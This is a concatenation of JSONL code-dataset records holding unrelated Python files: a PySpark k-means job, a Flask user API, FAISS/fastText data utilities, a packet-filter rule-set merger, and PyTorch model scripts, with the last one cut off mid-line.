GithubRequestThread(os.environ[\"GITHUB_USER_1\"]),\n GithubRequestThread(os.environ[\"GITHUB_USER_2\"])\n]\n\nprint(\"INFO: All threads are started\")\n\nfor thread in threads:\n print(\"INFO: Waiting for user '%s' request.\" % thread.username)\n thread.thread.join()\n\nprint(\"INFO: All threads completed\")\n","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"151715821","text":"from __future__ import print_function\n\nimport re\nimport sys\nfrom operator import add\nimport numpy as np\n\nfrom pyspark.sql import SparkSession\n\ndef parseNeigh(lines):\n parts = re.split(r',', lines)\n return np.array([parts[0],parts[1],parts[2],parts[3]])\n\ndef closestPoint(pq, centers):\n p=pq[1:].astype('float64')\n #print(\"1\")\n bestIndex = 0\n closest = float(\"+inf\")\n for i in range(len(centers)):\n tempDist = np.sum((p - centers[i]) ** 2)\n if tempDist < closest:\n closest = tempDist\n bestIndex = i\n #return p\n return bestIndex\n\ndef centro(x):\n #print(type(x))\n l=0\n for i in x:\n l=len(i)-1\n break\n a=np.zeros(l)\n c=0\n for k in x:\n c+=1\n i=k[1:].astype('float64')\n for j in range(l):\n a[j]+=i[j]\n for i in range(l):\n a[i]/=c\n return a\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: kmeans \", file=sys.stderr)\n sys.exit(-1)\n\n # Initialize the spark context.\n spark = SparkSession\\\n .builder\\\n .appName(\"K-Means\")\\\n .getOrCreate()\n\n lines = spark.read.text(sys.argv[1]).rdd.map(lambda r: r[0])\n data = lines.map(lambda lin: parseNeigh(lin)).cache()\n K=int(sys.argv[2])\n convergeDist = float(sys.argv[3])\n kPoints=data.takeSample(False,K,1)\n z=[]\n for i in kPoints:\n z.append([float(k) for k in i[1:]])\n for i in range(50):\n clcs=data.map(lambda x: (closestPoint(x,z),x)).groupByKey()\n '''for x,y in clcs.collect():\n print(x,y)\n '''\n abc=clcs.map(lambda x:(x[0],centro(x[1])))\n \n '''for x,y in abc.collect():\n print(x,y)'''\n for x,y in abc.collect():\n z[x]=y\n for i,j in clcs.collect():\n for x in j:\n print(x[0],\",\",i,sep=\"\")\n spark.stop()\n","sub_path":"Clustering/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573980834","text":"#!/usr/bin/python3\n\"\"\"\n Manage the RESTfull API for users\n\"\"\"\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.base_model import BaseModel\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\n\n\n@app_views.route(\"/users\", strict_slashes=False,\n methods=['GET'])\ndef users():\n \"\"\"Display all the users\"\"\"\n return jsonify([user.to_dict() for user in storage.all(User).values()])\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['GET'])\ndef get_user_id(user_id):\n \"\"\"Display the user matched by id\"\"\"\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n return jsonify(user_by_id.to_dict())\n abort(404)\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['DELETE'])\ndef delete_user_id(user_id):\n \"\"\"Delete the user matched by id\"\"\"\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n storage.delete(user_by_id)\n storage.save()\n return jsonify({}), 200\n abort(404)\n\n\n@app_views.route(\"/users\", strict_slashes=False,\n methods=['POST'])\ndef post_user():\n \"\"\"Create a new user\"\"\"\n json_req = request.get_json()\n if not json_req:\n abort(400, 'Not a JSON')\n if 'email' not in json_req:\n abort(400, 'Missing email')\n if 'password' not in json_req:\n abort(400, 'Missing password')\n new_user = User(**request.get_json())\n storage.new(new_user)\n storage.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['PUT'])\ndef put_user_id(user_id):\n \"\"\"Update a user in database\"\"\"\n json_req = request.get_json()\n if not json_req:\n abort(400, 'Not a JSON')\n user_by_id = storage.get(User, user_id)\n if user_by_id is not None:\n for attr, value in request.get_json().items():\n if (hasattr(user_by_id, attr) and\n attr != 'id' and attr != 'created_at' and\n attr != 'updated_at') and attr != 'email':\n setattr(user_by_id, attr, value)\n storage.save()\n return jsonify(user_by_id.to_dict()), 200\n abort(404)\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"342936742","text":"import array\nimport logging\nimport os\nimport subprocess\nimport time\nfrom os.path import join\n\nimport scipy.sparse as sp\n# from mtest.utils.data import load_csr, save_csr\nfrom tqdm import tqdm\n\nimport faiss\n# from ..utils.data import load_sift, save_sift\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nGT_IP_FNAME = 'sift_groundtruth.IP.ivecs'\nGT_IP_TXT = 'data.labels.txt'\nMAGIC_NUM = -90378\n\n\ndef generate_gt(data, path, skip_tests=False):\n logger.info(\"Generating data to be stored at {}\".format(join(path, GT_IP_FNAME)))\n\n if not isinstance(data, tuple):\n data = _load(str(data))\n\n logger.debug(f'Preparing the index')\n\n xt, xb, xq, gt = data\n\n d = xt.shape[1]\n k = gt.shape[1]\n\n indexIP = faiss.IndexFlatIP(d)\n indexIP.add(xb)\n\n logger.debug('Trainig the index')\n\n _, I = indexIP.search(xq, k)\n\n logger.debug('Predictions ready')\n\n # ignore all but the best vector\n I[:, 1:] = MAGIC_NUM\n\n _save(I, path)\n\n # sanity-check\n if not skip_tests:\n logger.info(\"Testing for inner-product ground-truth\")\n _test_gt((xt, xb, xq, I))\n\n\ndef prepare_ft(path_in, path_out, force=False):\n os.makedirs(path_out, exist_ok=True)\n\n logger.debug('Preparing train csr')\n (X_tr,\n Y_tr,\n w_mask,\n l_mask) = load_libsvm(path_in, 'train', min_words=3, min_labels=3, force=force)\n\n logger.debug('Preparing test csr')\n (X_te,\n Y_te,\n _,\n __) = load_libsvm(path_in, 'test', words_mask=w_mask, labels_mask=l_mask, force=force)\n\n logger.debug('Preparing ft')\n to_ft(X_tr, Y_tr, os.path.join(path_out, 'train.ft.txt'))\n to_ft(X_te, Y_te, os.path.join(path_out, 'test.ft.txt'))\n\n\ndef load_GT(path):\n G = []\n\n for line in open(path):\n row = [int(y) for y in line.split()]\n G += [{y for y in row\n if y >= 0}]\n\n return G\n\n\ndef load_sift(fname, dtype=np.float32):\n data = np.fromfile(fname, dtype=dtype)\n d = data[0].view(np.int32)\n\n data = data.reshape(-1, d + 1)[:, 1:]\n data = np.ascontiguousarray(data.copy())\n\n return data\n\n\ndef save_sift(obj, fname, dtype=np.float32):\n obj = np.hstack([\n np.ones((obj.shape[0], 1)) * obj.shape[1],\n obj\n ]).astype(dtype)\n\n obj.tofile(fname)\n\n\ndef _load(path):\n logger.debug(f'Loading {path}')\n\n xt = load_sift(join(path, \"sift_learn.fvecs\"))\n xb = load_sift(join(path, \"sift_base.fvecs\"))\n xq = load_sift(join(path, \"sift_query.fvecs\"))\n gt = load_sift(join(path, \"sift_groundtruth.ivecs\"), dtype=np.int32)\n\n return xt, xb, xq, gt\n\n\ndef _save(I, path):\n logger.debug(f'saving {GT_IP_FNAME}')\n save_sift(I, join(path, GT_IP_FNAME), dtype=np.int32)\n\n logger.debug(f'saving {GT_IP_TXT}')\n with open(join(path, GT_IP_TXT), 'w') as f:\n\n for row in tqdm(I):\n row = ' '.join([str(item) for item in row])\n print(row, file=f)\n\n\ndef _eval(index, xq, gt, prefix=\"\"):\n nq, k_max = gt.shape\n\n for k in [1, 5, 10]:\n t0 = time.time()\n D, I = index.search(xq, k)\n t1 = time.time()\n\n recall_at_1 = (I[:, :1] == gt[:, :1]).sum() / float(nq)\n\n print('\\t' + prefix + \": k={} {:.3f} s, R@1 {:.4f}\".format(k, t1 - t0, recall_at_1))\n\n\ndef _test_gt(data):\n logger.debug('Testing')\n\n xt, xb, xq, gt = data\n\n d = xt.shape[1]\n\n for Index in [faiss.IndexFlatIP, faiss.IndexFlatL2]:\n index = Index(d)\n index.add(xb)\n\n _eval(index, xq, gt, prefix=index.__class__.__name__)\n\n\ndef libsvm_to_csr(path):\n with open(path) as f_in:\n\n num_documents, num_features, num_labels = [int(val) for val in\n next(f_in).strip().split(' ')]\n\n y_indices = array.array('I')\n y_indptr = array.array('I', [0])\n\n x_indices = array.array('I')\n x_data = array.array('f')\n x_indptr = array.array('I', [0])\n\n with tqdm(total=num_documents, desc=f'libsvm to csr for {path}') as pb:\n\n for i, line in enumerate(f_in):\n labels, *features = line.strip().split()\n\n features = [item.split(\":\") for item in features]\n labels = [int(y) for y in labels.split(',')]\n\n if len(features) == 0:\n row_indices, row_values = [], []\n\n else:\n row_indices, row_values = zip(*features)\n row_indices, row_values = map(int, row_indices), map(float, row_values)\n\n x_indices.extend(row_indices)\n x_data.extend(row_values)\n x_indptr.append(len(x_indices))\n\n y_indices.extend(labels)\n y_indptr.append(len(y_indices))\n\n pb.update(1)\n\n x_indices = np.frombuffer(x_indices, dtype=np.uint32)\n x_indptr = np.frombuffer(x_indptr, dtype=np.uint32)\n x_data = np.frombuffer(x_data, dtype=np.float32)\n x_shape = (num_documents, num_features)\n\n y_indices = np.frombuffer(y_indices, dtype=np.uint32)\n y_indptr = np.frombuffer(y_indptr, dtype=np.uint32)\n y_data = np.ones_like(y_indices, dtype=np.float32)\n y_shape = (num_documents, num_labels)\n\n X = sp.csr_matrix((x_data, x_indices, x_indptr), shape=x_shape)\n Y = sp.csr_matrix((y_data, y_indices, y_indptr), shape=y_shape)\n\n return X, Y\n\n\ndef trim(_X, dim, t):\n _X = _X.tocsc() if (dim == 0) else _X.tocsr()\n _mask = np.array((_X > 0).sum(dim) >= t).ravel()\n\n return _mask\n\n\ndef load_libsvm(path, name='train', force=False, min_words=1, min_labels=1, words_mask=None, labels_mask=None):\n\n # data paths\n RAW_PATH = os.path.join(path, f'{name}.txt')\n X_PATH = os.path.join(path, f'X_{name}.csr.npz')\n Y_PATH = os.path.join(path, f'Y_{name}.csr.npz')\n\n # data already read\n if os.path.exists(X_PATH) and force is False:\n logger.info(f\"Data already present at {X_PATH}. Loading...\")\n\n X = load_csr(X_PATH)\n Y = load_csr(Y_PATH)\n\n return X, Y, None, None\n\n # data only in libsvm\n logger.info(f\"Data not found or `force` flag was passed.\")\n logger.debug(f\"I'm going to prepare_ft it and store at {X_PATH}.\")\n\n X, Y = libsvm_to_csr(RAW_PATH)\n\n logger.debug('# compute masks to get rid of examples with too little words or labels')\n if words_mask is None:\n words_mask = trim(X, dim=0, t=min_words)\n labels_mask = trim(Y, dim=0, t=min_labels)\n\n logger.debug('# discard unwanted columns')\n X = X.tocsc()[:, words_mask].tocsr()\n Y = Y.tocsc()[:, labels_mask].tocsr()\n\n logger.debug('# make sure each example has at leas one nonzero feature and one label')\n row_mask = trim(X, dim=1, t=1) & trim(Y, dim=1, t=1)\n X = X[row_mask, :] # type: sp.csr_matrix\n Y = Y[row_mask, :]\n\n logger.debug('# fix csr matrices')\n X.sort_indices()\n X.sum_duplicates()\n Y.sort_indices()\n Y.sum_duplicates()\n\n logger.debug('# save the result')\n save_csr(X, X_PATH)\n save_csr(Y, Y_PATH)\n\n return X, Y, words_mask, labels_mask\n\n\ndef to_ft(X: sp.csr_matrix, Y: sp.csr_matrix, fname: str):\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n\n with open(fname, 'w') as f:\n for row_x, row_y in tqdm(zip(X, Y), total=X.shape[0], desc=f'to_ft ({fname})'):\n xs, ys = row_x.indices, row_y.indices\n\n labels = [f'__label__{y}' for y in ys]\n feats = [f'feature_{x}' for x in xs]\n\n line = ' '.join(labels + feats)\n\n print(line, file=f)\n\n\ndef _fasttext_cmd(path, *args, **kwargs):\n args = ' '.join(args)\n opts = ' '.join(f'-{k} {v}' for k, v in kwargs.items())\n cmd = f'{path} {args} {opts}'\n\n return cmd.split()\n\n\ndef make_ft_fvecs(fasttext, path, thread):\n path = str(path)\n\n train_cmd = _fasttext_cmd(fasttext, 'supervised',\n input=os.path.join(path, 'train.ft.txt'),\n output=os.path.join(path, 'model.ft'),\n minCount=3,\n minCountLabel=3,\n lr=0.1,\n lrUpdateRate=100,\n dim=256,\n ws=5,\n epoch=25,\n neg=25,\n loss='ns',\n thread=thread,\n saveOutput=1)\n\n generate_cmd = _fasttext_cmd(fasttext, 'to-fvecs',\n os.path.join(path, 'model.ft.bin'),\n os.path.join(path, 'test.ft.txt'),\n os.path.join(path, 'data'))\n\n subprocess.call(train_cmd)\n subprocess.call(generate_cmd)\n\n\ndef save_csr(obj, filename):\n np.savez(filename, data=obj.data, indices=obj.indices, indptr=obj.indptr,\n shape=obj.shape)\n\n\ndef load_csr(filename: str):\n loader = np._load(filename)\n\n data = loader['data']\n indices = loader['indices']\n indptr = loader['indptr']\n shape = loader['shape']\n\n return sp.csr_matrix((data, indices, indptr),\n shape=shape)\n#\n#\n# def _load(path):\n# logger.debug(f'Loading {path}')\n#\n# xt = load_sift(join(path, \"sift_learn.fvecs\"))\n# xb = load_sift(join(path, \"sift_base.fvecs\"))\n# xq = load_sift(join(path, \"sift_query.fvecs\"))\n# gt = load_sift(join(path, \"sift_groundtruth.ivecs\"), dtype=np.int32)\n#\n# return xt, xb, xq, gt\n#\n#\n# def _save(I, path):\n# logger.debug(f'saving {GT_IP_FNAME}')\n# save_sift(I, join(path, GT_IP_FNAME), dtype=np.int32)\n#\n# logger.debug(f'saving {GT_IP_TXT}')\n# with open(join(path, GT_IP_TXT), 'w') as f:\n#\n# for row in tqdm(I):\n# row = ' '.join([str(item) for item in row])\n# print(row, file=f)\n#\n#\n# def _eval(index, xq, gt, prefix=\"\"):\n# nq, k_max = gt.shape\n#\n# for k in [1, 5, 10]:\n# t0 = time.time()\n# D, I = index.search(xq, k)\n# t1 = time.time()\n#\n# recall_at_1 = (I[:, :1] == gt[:, :1]).sum() / float(nq)\n#\n# print('\\t' + prefix + \": k={} {:.3f} s, R@1 {:.4f}\".format(k, t1 - t0, recall_at_1))\n#\n#\n# def _test_gt(data):\n# logger.debug('Testing')\n#\n# xt, xb, xq, gt = data\n#\n# d = xt.shape[1]\n#\n# for Index in [faiss.IndexFlatIP, faiss.IndexFlatL2]:\n# index = Index(d)\n# index.add(xb)\n#\n# _eval(index, xq, gt, prefix=index.__class__.__name__)\n","sub_path":"python/pymips/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442464312","text":"#!/usr/bin/python\r\n#coding=utf-8\r\nimport os\r\nimport re\r\nfrom operator import itemgetter,attrgetter\r\nfrom _random import Random\r\nimport random\r\n\r\n# print(os.name)\r\n\r\n\r\nclass IPDATA_PROC:\r\n\r\n # 32+32+16+16\r\n# pattern=re.compile(r'\\@\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)')\r\n \r\n # 32+32+16+16_8_16\r\n pattern=re.compile(r'\\@\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\.(\\d+).(\\d+).(\\d+)\\/(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\d+)\\s*\\:\\s*(\\d+)\\s*(\\w+)\\/(\\w+)\\s*(\\w+)\\/(\\w+)')\r\n\r\n def __init__(self):\r\n self.rule_set=[] \r\n self.merge_set=[] \r\n\r\n \r\n def TransFormat(self,m1): \r\n '''\r\n \r\n :param m1:match\r\n \r\n retue rule 6 feilds\r\n \r\n '''\r\n \r\n for x in range(0,6,5):\r\n ip1=int(m1.group(x+1))<<24 & 0xFF000000\r\n ip2=int(m1.group(x+2))<<16 & 0x00FF0000\r\n ip3=int(m1.group(x+3))<<8 & 0x0000FF00\r\n ip4=int(m1.group(x+4)) & 0x000000FF\r\n tmask=int(m1.group(x+5))\r\n tmpdip=(ip1 | ip2 | ip3 | ip4)\r\n \r\n if(tmask < 32):\r\n mask=2**(32-tmask)-1\r\n ipend=tmpdip | mask\r\n ipstart= tmpdip & (~mask)\r\n else:\r\n ipend=tmpdip\r\n ipstart=tmpdip\r\n \r\n H16_ipstart=str((ipstart >> 16) & 0xFFFF)\r\n H16_ipend=str((ipend >> 16) & 0xFFFF)\r\n \r\n L16_ipstart=str(ipstart & 0xFFFF)\r\n L16_ipend=str(ipend & 0xFFFF)\r\n\r\n for x in range(11,14,2):\r\n dport_start=m1.group(x)\r\n dport_end=m1.group(x+1)\r\n \r\n rule=(H16_ipstart,H16_ipend,L16_ipstart,L16_ipend,dport_start,dport_end)\r\n \r\n return rule\r\n \r\n def ReadFilterSet(self,file_name):\r\n\r\n with open(file_name, mode='r') as handle: \r\n for line in handle.readlines(): \r\n\r\n # m1=re.search(r'(\\d+\\.\\d+\\.\\d+\\.\\d+\\/d+\\s\\d+\\.\\d+\\.\\d+\\.\\d+)',strings)\r\n m1=re.match(self.pattern,line)\r\n if m1:\r\n# print(m1.group(0))\r\n# print(m1.group(18))\r\n rule=[]\r\n for x in range(1, 15): \r\n rule.append(int(m1.group(x)))\r\n for x in range(15, 19): \r\n rule.append(int(m1.group(x),16))\r\n \r\n# rule=tuple(rule)\r\n# print(rule)\r\n# print(len(rule))\r\n self.rule_set.append(rule)\r\n\r\n\r\n else:\r\n print(\"no match rules...\")\r\n\r\n return\r\n \r\n def SortMerge(self,tot):\r\n \r\n tmp_set=[]\r\n \r\n for x in range(0,tot):\r\n indx=random.randint(0,len(self.rule_set)-1)\r\n tmp_set.append(self.rule_set[indx])\r\n \r\n print(\"len(tmp_set) is \",len(tmp_set))\r\n \r\n #group(4)group(9) is mask\r\n # 11-10 13-12 15-14 17-16\r\n for rule in tmp_set:\r\n rule.append(rule[11]-rule[10])\r\n rule.append(rule[13]-rule[12])\r\n rule.append(rule[15]-rule[14])\r\n rule.append(rule[17]-rule[16])\r\n \r\n \r\n # 4,9 is mask\r\n # 18 19 20 21 is range\r\n tmp_set=sorted(tmp_set,key=itemgetter(18,19,20,21),reverse=False)\r\n tmp_set=sorted(tmp_set,key=itemgetter(4,9),reverse=True)\r\n\r\n cmp=None\r\n for x in tmp_set: \r\n if x!=cmp:\r\n cmp=x\r\n self.merge_set.append(x)\r\n# print(x)\r\n\r\n return \r\n \r\n def WriteMergeSet(self,file_name):\r\n \r\n with open(file_name,mode=\"w\") as handle:\r\n for rule in self.merge_set:\r\n \r\n# print(rule)\r\n# handle.write(str(rule[4])+\" \"+str(rule[9])+\"\\n\")\r\n handle.write(\"@ \") \r\n handle.write(str(rule[0])+\".\")\r\n handle.write(str(rule[1])+\".\")\r\n handle.write(str(rule[2])+\".\")\r\n handle.write(str(rule[3])+\"/\")\r\n handle.write(str(rule[4])+\" \")\r\n handle.write(str(rule[5])+\".\")\r\n handle.write(str(rule[6])+\".\")\r\n handle.write(str(rule[7])+\".\")\r\n handle.write(str(rule[8])+\"/\")\r\n handle.write(str(rule[9])+\" \") \r\n handle.write(str(rule[10])+\":\")\r\n handle.write(str(rule[11])+\" \")\r\n handle.write(str(rule[12])+\":\")\r\n handle.write(str(rule[13])+\" \")\r\n handle.write(str(hex(rule[14]))+\"/\")\r\n handle.write(str(hex(rule[15]))+\" \")\r\n handle.write(str(hex(rule[16]))+\"/\")\r\n handle.write(str(hex(rule[17]))+\"\\n\")\r\n \r\n return\r\n \r\nif __name__ == \"__main__\":\r\n\r\n \r\n proc=IPDATA_PROC()\r\n proc.ReadFilterSet(\"table_acl1_10k\")\r\n proc.ReadFilterSet(\"table_acl2_10k\")\r\n proc.ReadFilterSet(\"table_acl3_10k\")\r\n proc.ReadFilterSet(\"table_acl4_10k\")\r\n proc.ReadFilterSet(\"table_acl5_10k\")\r\n proc.ReadFilterSet(\"table_fw1_10k\")\r\n proc.ReadFilterSet(\"table_fw2_10k\")\r\n proc.ReadFilterSet(\"table_fw3_10k\")\r\n proc.ReadFilterSet(\"table_fw4_10k\")\r\n proc.ReadFilterSet(\"table_fw5_10k\")\r\n proc.ReadFilterSet(\"table_ipc1_10k\")\r\n proc.ReadFilterSet(\"table_ipc2_10k\")\r\n \r\n \r\n proc.SortMerge(1*1024)\r\n proc.WriteMergeSet(\"out.txt\")\r\n print(\"len(proc.rule_set) is %d\" % len(proc.rule_set))\r\n print(\"len(proc.merge_set) is %d\" % len(proc.merge_set))\r\n \r\n\r\n","sub_path":"pyDemo/DataProc/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"648669590","text":"import nets\nfrom macros import *\nimport torch\nimport utils\nimport opts\nimport argparse\nimport training\nfrom torch import nn\nfrom torch import optim\nfrom tasks import prop_entailment, \\\n prop_entailment_2enc, \\\n rewriting, \\\n rte, \\\n scan, \\\n pattern\n\n\nif __name__ == '__main__':\n parser = argparse. \\\n ArgumentParser(description='main.py',\n formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n\n opts.model_opts(parser)\n opts.train_opts(parser)\n opt = parser.parse_args()\n\n utils.init_seed(opt.seed)\n\n build_iters = None\n train = None\n valid = None\n Model = None\n criterion = None\n if opt.task == 'prop-entail':\n build_iters = prop_entailment.build_iters\n train = prop_entailment.train\n valid = prop_entailment.valid\n Model = prop_entailment.Model\n\n if opt.task == 'prop-entail-2enc':\n build_iters = prop_entailment_2enc.build_iters\n train = prop_entailment_2enc.train\n valid = prop_entailment_2enc.valid\n Model = prop_entailment_2enc.Model\n\n if opt.task == 'rewriting':\n build_iters = rewriting.build_iters\n train = rewriting.train\n valid = rewriting.valid\n Model = rewriting.Model\n\n if opt.task == 'rte':\n build_iters = rte.build_iters\n train = rte.train\n valid = rte.valid\n Model = rte.Model\n\n if opt.task == 'scan':\n build_iters = scan.build_iters\n train = scan.train\n valid = scan.valid\n Model = scan.Model\n\n if opt.task == 'pattern':\n build_iters = pattern.build_iters\n train = pattern.train\n valid = pattern.valid\n Model = pattern.Model\n\n param_iter = {'ftrain': opt.ftrain,\n 'fvalid': opt.fvalid,\n 'bsz': opt.bsz,\n 'device': opt.gpu,\n 'sub_task': opt.sub_task,\n 'num_batches_train': opt.num_batches_train,\n 'num_batches_valid': opt.num_batches_valid,\n 'min_len_train': opt.min_len_train,\n 'min_len_valid': opt.min_len_valid,\n 'max_len_train': opt.max_len_train,\n 'max_len_valid': opt.max_len_valid,\n 'repeat_min_train': opt.repeat_min_train,\n 'repeat_max_train': opt.repeat_max_train,\n 'repeat_min_valid': opt.repeat_min_valid,\n 'repeat_max_valid': opt.repeat_max_valid,\n 'seq_width': opt.seq_width}\n\n res_iters = build_iters(param_iter)\n\n embedding = None\n embedding_enc = None\n embedding_dec = None\n SEQ = None\n SRC = None\n TAR = None\n if 'SEQ' in res_iters.keys():\n SEQ = res_iters['SEQ']\n embedding = nn.Embedding(num_embeddings=len(SEQ.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=SEQ.vocab.stoi[PAD])\n\n if 'SRC' in res_iters.keys() and 'TAR' in res_iters.keys():\n SRC = res_iters['SRC']\n embedding_enc = nn.Embedding(num_embeddings=len(SRC.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=SRC.vocab.stoi[PAD])\n\n TAR = res_iters['TAR']\n embedding_dec = nn.Embedding(num_embeddings=len(TAR.vocab.itos),\n embedding_dim=opt.edim,\n padding_idx=TAR.vocab.stoi[PAD])\n\n location = opt.gpu if torch.cuda.is_available() and opt.gpu != -1 else 'cpu'\n device = torch.device(location)\n\n if opt.emb_type == 'one-hot':\n if embedding is not None:\n one_hot_mtrx = utils.one_hot_matrix(SEQ.vocab.stoi, device, opt.edim)\n embedding.weight.data.copy_(one_hot_mtrx)\n embedding.weight.requires_grad = False\n\n if embedding_enc is not None:\n one_hot_mtrx = utils.one_hot_matrix(SRC.vocab.stoi, device, opt.edim)\n embedding_enc.weight.data.copy_(one_hot_mtrx)\n embedding_enc.weight.requires_grad = False\n\n if embedding_dec is not None:\n one_hot_mtrx = utils.one_hot_matrix(TAR.vocab.stoi, device, opt.edim)\n embedding_dec.weight.data.copy_(one_hot_mtrx)\n embedding_dec.weight.requires_grad = False\n\n encoder = None\n decoder = None\n if opt.enc_type == 'simp-rnn':\n encoder = nets.EncoderSimpRNN(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'lstm':\n encoder = nets.EncoderLSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'alstm':\n encoder = nets.EncoderALSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.enc_type == 'ntm':\n encoder = nets.EncoderNTM(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M)\n if opt.enc_type == 'dnc':\n encoder = nets.EncoderDNC(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M,\n gpu=opt.gpu)\n if opt.enc_type == 'sarnn':\n encoder = nets.EncoderSARNN(idim=opt.edim,\n hdim=opt.hdim,\n nstack=opt.nstack,\n stack_size=opt.stack_size,\n sdim=opt.sdim,\n sdepth=opt.stack_depth)\n if opt.enc_type == 'nse':\n encoder = nets.EncoderNSE(idim=opt.edim,\n dropout=opt.dropout,\n N=opt.N)\n\n if opt.enc_type == 'tardis':\n a = int(opt.M * opt.a_ratio)\n c = opt.M - a\n encoder = nets.EncoderTARDIS(idim=opt.edim,\n hdim=opt.hdim,\n N=opt.N,\n a=a,\n c=c,\n is_soft=opt.soft_enc)\n\n if opt.dec_type == 'simp-rnn':\n decoder = nets.DecoderSimpRNN(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'lstm':\n decoder = nets.DecoderLSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'alstm':\n decoder = nets.DecoderALSTM(idim=opt.edim,\n hdim=opt.hdim,\n dropout=opt.dropout)\n\n if opt.dec_type == 'ntm':\n decoder = nets.DecoderNTM(idim=opt.edim,\n cdim=opt.hdim,\n num_heads=opt.num_heads,\n N=opt.N,\n M=opt.M)\n\n if opt.dec_type == 'sarnn':\n decoder = nets.DecoderSARNN(idim=opt.edim,\n hdim=opt.hdim,\n nstack=opt.nstack,\n stack_size=opt.stack_size,\n sdim=opt.sdim,\n sdepth=opt.stack_depth)\n\n if opt.dec_type == 'nse':\n decoder = nets.DecoderNSE(idim=opt.edim,\n N=opt.N,\n dropout=opt.dropout)\n\n if opt.dec_type == 'tardis':\n a = int(opt.M * opt.a_ratio)\n c = opt.M - a\n decoder = nets.DecoderTARDIS(idim=opt.edim,\n hdim=opt.hdim,\n N=opt.N,\n a=a,\n c=c,\n is_soft=opt.soft_dec)\n\n model = None\n if TAR is None:\n if embedding is None:\n model = Model(encoder, opt.odim).to(device)\n else:\n model = Model(encoder, embedding).to(device)\n utils.init_model(model)\n else:\n model = Model(encoder, decoder,\n embedding_enc, embedding_dec,\n TAR.vocab.stoi[SOS]).to(device)\n utils.init_model(model)\n\n if opt.fload is not None:\n model_fname = opt.fload\n location = {'cuda:' + str(opt.gpu): 'cuda:' + str(opt.gpu)} if opt.gpu != -1 else 'cpu'\n model_path = os.path.join(RES, model_fname)\n model_dict = torch.load(model_path, map_location=location)\n model.load_state_dict(model_dict)\n print('Loaded from ' + model_path)\n\n if TAR is None:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.CrossEntropyLoss(ignore_index=TAR.vocab.stoi[PAD])\n\n if opt.task == 'pattern':\n criterion = nn.BCELoss()\n\n optimizer = optim.Adam(params=filter(lambda p: p.requires_grad, model.parameters()),\n lr=opt.lr,\n weight_decay=opt.wdecay)\n # optimizer = optim.SGD(params=filter(lambda p: p.requires_grad, model.parameters()),\n # lr=opt.lr,\n # weight_decay=opt.wdecay)\n # optimizer = optim.RMSprop(params=filter(lambda p: p.requires_grad, model.parameters()),\n # momentum=0.9,\n # alpha=0.95,\n # lr=1e-4)\n\n param_str = utils.param_str(opt)\n for key, val in param_str.items():\n print(str(key) + ': ' + str(val))\n\n print(valid(model, res_iters['valid_iter'], res_iters['rewriting_map']))\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367818121","text":"import torch\nfrom torch import nn\n\nfrom utils import get_config\nfrom _layers import ResBlockDownsample, Conv2dBlock, Conv2dUpsampleBlock\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, config_dis):\n super(Discriminator, self).__init__()\n\n input_nc = input_nc\n dim = config_dis['dim']\n norm = config_dis['norm']\n activation = config_dis['activation']\n n_layer = config_dis['n_layer']\n pad_type = config_dis['pad_type']\n self.num_scales = config_dis['num_scales']\n\n self.blocks = []\n for scale in range(self.num_scales):\n block = self.build_block(input_nc, dim // (2 ** scale), norm, activation, n_layer, pad_type)\n self.add_module('model_{}'.format(scale), block)\n\n def build_block(self, input_nc, dim, norm, activation, n_layer, pad_type):\n layers = []\n layers += [Conv2dBlock(input_nc, dim, 7, 2, 3, 'none', activation, pad_type)]\n for i in 